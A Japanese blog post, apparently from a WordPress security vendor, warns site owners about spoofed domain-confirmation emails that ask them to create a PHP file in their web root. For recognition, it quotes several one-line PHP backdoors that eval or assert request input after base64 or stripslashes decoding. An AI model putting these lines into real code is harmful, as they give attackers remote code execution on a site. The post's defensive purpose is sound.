偽のドメイン確認メールを信じないでください
もしあなたのウェブサイトにPHPコードを作成、ダウンロード、またはインストールすることを要求する手紙を受け取った場合は、無視してください。
English version: Do not trust those fake domain confirmation emails
最近、私のクライアントの何人かがドメイン登録業者から奇妙なメールを受け取りました。そのメールには、自分のドメインの確認を求める内容が書かれています。私はそのメールの 1 つをチェックし、すぐに詐欺メールだと特定しました。メールのパターンはすべて同じで、特定の名前と指定されたコンテンツを持つ Web サイトのルート フォルダーに PHP ファイルを作成するよう要求しています。言うまでもなく、その PHP ファイルの推奨コンテンツには、バックドア コードと呼ばれる悪意のあるコードが含まれています。この種のコードにより、攻撃者は被害者の Web サイトで任意のアクションを実行できます。
あなたのウェブサイトに PHP コードを作成、ダウンロード、またはインストールすることを要求する手紙を受け取った場合は、必ず無視してください。例外はありません。たとえその手紙が社長やあなたのお母さんから来たものであってもです。
詐欺メールは、正当な差出人メールアドレスを使用しているため、正当なメールのように見えます。しかし、それはメールのなりすましです。友人やドメイン登録業者から偽のメールが届くとは思いませんよね。いいえ、ありません。どのメールにも、任意の差出人メールアドレスが含まれている可能性があります。ほとんどのメールサーバーとメールクライアントは、送信者アドレスを確認または検証しません。そのため、ハッカーが指名手配しているメールとみなされます。既知の送信者から受信したメールに、Web サイトにコードをインストールしたり、コンピューターにアプリケーションをインストールしたりするなどの疑わしいアクションの要求が含まれている場合は、そのメールを信頼しないでください。
技術的な詳細
偽の電子メールには通常、次の PHP 行がいくつか含まれています。
assert(stripslashes($_REQUEST['something']));
eval(stripslashes($_REQUEST['something']));
assert(base64_decode($_REQUEST['something']));
eval(base64_decode($_REQUEST['something']));
参考までに: base64_decode、eval、assert は、疑わしいまたは悪意のある PHP コードのよく知られたマーカーです。
WordPress 5.4.1。セキュリティアップデートで7つのXSS脆弱性が修正されました
WP Cerber Security 8.6.5
I'm a team lead in Cerber Tech. I'm a software & database architect, WordPress - PHP - SQL - JavaScript developer. I started coding in 1993 on IBM System/370 (yeah, that was amazing days) and today software engineering at Cerber Tech is how I make my living. I've taught to have high standards for myself as well as using them in developing software solutions.